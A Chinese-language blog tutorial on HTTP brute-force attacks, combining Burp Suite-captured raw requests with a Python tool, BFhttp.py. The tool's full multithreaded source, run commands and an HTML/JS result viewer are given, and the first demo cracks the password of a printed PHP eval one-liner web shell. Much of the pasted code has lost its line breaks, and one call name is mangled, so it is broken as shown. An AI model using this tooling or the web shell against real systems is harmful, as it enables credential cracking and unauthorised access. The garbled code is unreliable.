python与Burp Suite联动暴力破解

暴力破解"/>

python与Burp Suite联动暴力破解

程序直接使用BP抓取的原包进行暴力破解

关键点:argparse库、pandas库、HackRequests库、Burp Suite。
思路：
<1>.页面提交pybf1=username&pybf2=password等格式的数据;
<2>.Burp Suite抓取原始数据包放入req.txt文件;
<3>.BFhttp.py取原始数据包将pybf1、pybf2…pybfn等替换成字典内容
<4>.利用HackRequests库暴力破解;
<5>.利用pandas库处理保存数据或保存为json数据在html页面上显示

演示1.暴力破解一句话木马

<1>.页面提交pybf1=username&pybf2=password等格式的数据;
一句话木马caidoa:

<?php@eval($_POST['cmd']);
?>

<2>.Burp Suite抓取原始数据包放入req.txt文件;
<3>.BFhttp.py取原始数据包将pybf1、pybf2…pybfn等替换成字典内容
<4>.BFhttp.py利用HackRequests库暴力破解;
BFhttp.py文件源码:

# coding=utf-8import argparse
import re
import itertools
import sys
import timeimport pandas
from urllib3.connectionpool import xrange
import HackRequestsimport numpy as np
import pandas as pd
import html5libclass BFhttp(object):def __init__(self, args):self.args = argsself.payloads = []self.payloadsQueue = HackRequests.queue.Queue()  # FIFO 队列中，先添加的任务先取回self.hack = HackRequests.hackRequests()self.result = {}self.result2 = []self.pwdlength = 0self.number = 0def parseRaw(self):with open(self.args.reqfile) as f:self.raw = f.read()def parsePayloads(self):for i in range(self.payloadLenght):f = open(self.args.payloads[i], 'r')for p in f:self.payloads.append(p.rstrip())def getOrgRes(self):html = self.hack.httpraw(self.raw).text()selfData = htmldef nowTime(self):return time.time()def _callback(self, r: HackRequests.response,ywlstr):if selfData == r.text():bruteSate = "Same"else:bruteSate = "Different"# payloads = "\"" + str(ywlstr) + "\""# id = "\"" + str(self.number) + "\""payloads = str(ywlstr)id = str(self.number)self.result.setdefault('id', []).append(id)self.result.setdefault('payloads', []).append(payloads)self.result.setdefault('bruteSate', []).append(bruteSate)self.result.setdefault('status_code', []).append(r.status_code)self.result.setdefault('text_len', []).append(len(r.text()))self.number = self.number + 1def saveresult(self):data = self.resultser1 = pd.DataFrame(data, index=pd.Series(range(self.number)))pandas.set_option('display.width', 1000)  # 设置字符显示宽度pandas.set_option('display.max_rows', None)  # 设置显示最大行pandas.set_option('display.max_columns', None)  # 设置显示最大例if self.args.outputmode == "csv":if self.args.outfile:f = open(self.args.outfile, 'w')f.close()ser1.to_csv(self.args.outfile, index=False)message = self.args.outfileelse:f = open('excel.xlsx', 'w')f.close()ser1.to_excel('example.csv', sheet_name='Sheet1')message = 'example.csv'if self.args.outputmode == "excel":if self.args.outfile:f = open(self.args.outfile, 'w')f.close()ser1.to_excel(self.args.outfile, sheet_name='Sheet1')message = self.args.outfileelse:f = open('excel.xlsx', 'w')f.close()ser1.to_excel('excel.xlsx', sheet_name='Sheet1')message = 'excel.xlsx'if self.args.outputmode == "html":self.saveResult()message = "Please use json.html+json.js+json.txt"if self.args.outputmode:print("=====================\n")print("created:" + message + "\n")print("=====================\n")print(ser1)def run(self):self.payloadLenght = len(self.args.payloads)self.parsePayloads()self.payloads = list(itertoolsbinations(self.payloads, self.payloadLenght))self.payloads = list(set(self.payloads))  # 去重self.parseRaw()self.getOrgRes()for p in xrange(len(self.payloads)):self.payloadsQueue.put(self.payloads[p])  # 将 item 放入队列。self.start()def parseRawb(self, count, payloads):keyWord = 'pybf' + str(count + 1)try:Content_Length = re.findall('Content-Length: (.*?)\n', self._raw)[0].rstrip()if len(keyWord) > len(payloads[count - 1]):sub = len(keyWord) - len(payloads[count - 1])NewContent_Length = int(Content_Length) - subself._raw = self._raw.replace(re.findall('Content-Length: (.*?)\n', self._raw)[0].rstrip(),str(NewContent_Length))elif len(keyWord) < len(payloads[count - 1]):sub = len(payloads[count - 1]) - len(keyWord)NewContent_Length = int(Content_Length) + subself._raw = self._raw.replace(re.findall('Content-Length: (.*?)\n', self._raw)[0].rstrip(),str(NewContent_Length))except Exception as e:passfinally:self._raw = self._raw.replace(keyWord, payloads[count - 1])def start(self):self._queue = self.payloadsQueueself.lenght = self.payloadLenghtself._raw = self.rawthreadpool = HackRequests.threadpool(threadnum=self.args.thread, callback=self._callback, timeout=args.timeout)while not self._queue.empty():  # .empty()如果队列为空，返回 True ，否则返回 Falsepayloads = self._queue.get_nowait()  # 相当于 get(False) ，从队列中移除并返回一个项目for i in range(self.lenght):self.parseRawb(i, payloads)threadpool.httpraw(raw=self._raw,ywlstr=str(payloads))self._raw = self.rawthreadpool.run()self.saveresult()def saveResult(self):data = str(self.result)if self.payloadLenght == 1:data = data.replace('\'', '\"')data = data.replace('"("', '\"')data = data.replace('",)"', '\"')else:data = data.replace('\'', '\"')data = data.replace('"(', '[')data = data.replace(')"', ']')f = open('data\data.txt', 'w')f.write(data)f.close()if __name__ == '__main__':print('''author:ywl_   __ __  _   _| |_| |__   ___  _ __| '_ \| | | | __| '_ \ / _ \| '_ \\| |_) | |_| | |_| | | | (_) | | | || .__/ \__, |\__|_| |_|\___/|_| |_||_|    |___/''')parser = argparse.ArgumentParser(description="httpBruteForce Tool Ver:1.0")parser.add_argument("-n", "--thread", metavar="", type=int, default=10, help="Thread Count default is 10")parser.add_argument("-t", "--timeout", metavar="", type=int, default=2, help="timeout default is 2")parser.add_argument("-r", "--reqfile", metavar="", help="raqFile")parser.add_argument("-p", "--payloads", nargs="*", help="Payloads,pybfn...pybf2,pybf1")parser.add_argument("-om", "--outputmode", type=str, help="outputmode: csv,excel,html")parser.add_argument("-of", "--outfile", type=str, default="",help="output file address,default is current location")args = parser.parse_args()if args.reqfile and args.payloads:try:BFhttp = BFhttp(args)BFhttp.run()except KeyboardInterrupt:sys.exit(-1)sys.exit(1)else:parser.print_help()
'''运行步骤:<1>.提交pybf1..<2>.在Burp Suite抓取完整包copy入req.txt<3>.python BFhttp.py -r req.txt -p password.txtpython BFhttp.py -r req.txt -p password.txt -om csvpython  BFhttp.py -r req.txt -p password.txt -om excelpython BFhttp.py -r req.txt -p user.txt -om htmlpython BFhttp.py -r req2.txt -p password.txt user.txt -om html
'''

代码筒单易懂,利用了HackRequests库的多并发,HackRequests库网上有源码,不大.为了方便记录数据,对HackRequests库的HackRequests.py的一些函数作如下修改:

    def httpraw(self, raw: str, ssl: bool = False, proxy=None, location=True, ywlstr= str):func = self.hack.httprawself.queue.put({"func": func, "raw": raw, "ssl": ssl,"proxy": proxy, "location": location, "ywlstr": ywlstr})def scan(self):while 1:if self.queue.qsize() > 0 and self.isContinue:p = self.queue.get()else:breakfunc = p.pop("func")url = p.get("url", None)ywlstr = p.get("ywlstr", None)try:if url is None:raw = p.pop('raw')h = func(raw, **p)else:h = func(url, **p.get("kw"))self._callback(h,ywlstr=ywlstr)except Exception as e:print(url, e)self.changeThreadCount(-1)             

演示结果:


保存为json数据在html页面上显示:

<!--查示json数据-->
<!DOCTYPE html>
<html><head><title>结果</title><link href="bootstrap-3.0.0/dist/css/bootstrap.min.css" rel="stylesheet" media="screen"><meta charset="utf-8"><script src="jquery-3.5.1/jquery-3.5.1.min.js"></script><script src="json.js"></script></head><body><h1 align="center">[扫描结果]</h1><div id="json"><table class="table table-bordered" id="python"><thead><tr><th><p align="center">id <button id="bt1" class="glyphicon glyphicon-chevron-down btn-xs btn btn-default active"></button></p></th><th><p align="center">payload</p></th><th><p align="center">bruteSate <button id="bt3" class="glyphicon glyphicon-chevron-down btn-xs"></button></p></th><th><p align="center">status_code <button id="bt4" class="glyphicon glyphicon-chevron-down btn-xs"></button></p></th><th><p align="center">text_len <button id="bt5" class="glyphicon glyphicon-chevron-down btn-xs"></button></p></th></tr></thead><tbody id="tbody"></tbody></table></div></body>
</html>

js文件:

var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {if (this.readyState == 4 && this.status == 200) {data = JSON.parse(this.responseText);var sort = 1;getdata(sort);}
};
xmlhttp.open("GET", "data.txt", true);
xmlhttp.send();function getdata(sort,size=20){var ids = data.id;var payloads = data.payloads;var bruteSates = data.bruteSate;var status_codes = data.status_code;var text_lens = data.text_len;var tbody = '';if(sort == 5){for (var i=0; i<text_lens.length-1;i++) {for (var j=0; j<text_lens.length-1-i;j++) {if(text_lens[j] < text_lens[j + 1]){var temp = text_lens[j];text_lens[j] = text_lens[j+1];text_lens[j+1] = temp;var temp = ids[j];ids[j] = ids[j+1];ids[j+1] = temp;var temp = payloads[j];payloads[j] = payloads[j+1];payloads[j+1] = temp;var temp = bruteSates[j];bruteSates[j] = bruteSates[j+1];bruteSates[j+1] = temp;var temp = status_codes[j];status_codes[j] = status_codes[j+1];status_codes[j+1] = temp;}}}}else if(sort == 4){var flag = 0;for (var i=0; i<text_lens.length;i++) {if(status_codes[i] == 200){var temp2 = bruteSates[i];bruteSates[i] = bruteSates[flag];bruteSates[flag] = temp2;var temp2 = ids[i];ids[i] = ids[flag];ids[flag] = temp2;var temp2 = payloads[i];payloads[i] = payloads[flag];payloads[flag] = temp2;var temp2 = status_codes[i];status_codes[i] = status_codes[flag];status_codes[flag] = temp2;var temp2 = text_lens[i];text_lens[i] = text_lens[flag];text_lens[flag] = temp2;flag +=1;}}}else if(sort == 3){var flag = 0;for (var i=0; i<text_lens.length;i++) {if(bruteSates[i] == "Different"){var temp2 = bruteSates[i];bruteSates[i] = bruteSates[flag];bruteSates[flag] = temp2;var temp2 = ids[i];ids[i] = ids[flag];ids[flag] = temp2;var temp2 = payloads[i];payloads[i] = payloads[flag];payloads[flag] = temp2;var temp2 = status_codes[i];status_codes[i] = status_codes[flag];status_codes[flag] = temp2;var temp2 = text_lens[i];text_lens[i] = text_lens[flag];text_lens[flag] = temp2;flag +=1;}}}for (i in data.id) {var id = ids[i];var payload = payloads[i];var bruteSate = bruteSates[i];var status_code = status_codes[i];var text_len = text_lens[i];tbody += '<tr class="active">'+'<td><p align="center"><span style="font-size:'+size+'px" class="badge">'+id+'</span></p></td>' +'<td><p align="center"><span style="font-size:'+size+'px" class="badge">'+payload+'</span></p></td>' +'<td><p align="center"><span style="font-size:'+size+'px" class="badge">'+bruteSate+'</span></p></td>' +'<td><p align="center"><span style="font-size:'+size+'px" class="badge">'+status_code+'</span></p></td>' +'<td><p align="center"><span style="font-size:'+size+'px" class="badge">'+text_len+'</span></p></td>' +'</tr>';}var html = document.getElementById("tbody");html.innerHTML = tbody;
}$(document).ready(function(){$("#bt1").click(function(){$("button").attr("class","glyphicon glyphicon-chevron-down btn-xs");$("#bt1").attr("class","glyphicon glyphicon-chevron-down btn-xs btn btn-default active");history.go(0);});$("#bt3").click(function(){$("button").attr("class","glyphicon glyphicon-chevron-down btn-xs");$("#bt3").attr("class","glyphicon glyphicon-chevron-down btn-xs btn btn-default active");getdata(3);});$("#bt4").click(function(){$("button").attr("class","glyphicon glyphicon-chevron-down btn-xs");$("#bt4").attr("class","glyphicon glyphicon-chevron-down btn-xs btn btn-default active");getdata(4);});$("#bt5").click(function(){$("button").attr("class","glyphicon glyphicon-chevron-down btn-xs");$("#bt5").attr("class","glyphicon glyphicon-chevron-down btn-xs btn btn-default active");getdata(5);});
});

路径需要大家自己修改下,显示结果如下:

还可以输出为csv,excel格式文件:
python BFhttp.py -r req.txt -p password.txt -om csv -of data.csv

python BFhttp.py -r req.txt -p password.txt -om excel -of excel.xlsx

演示2.暴力破解DVWA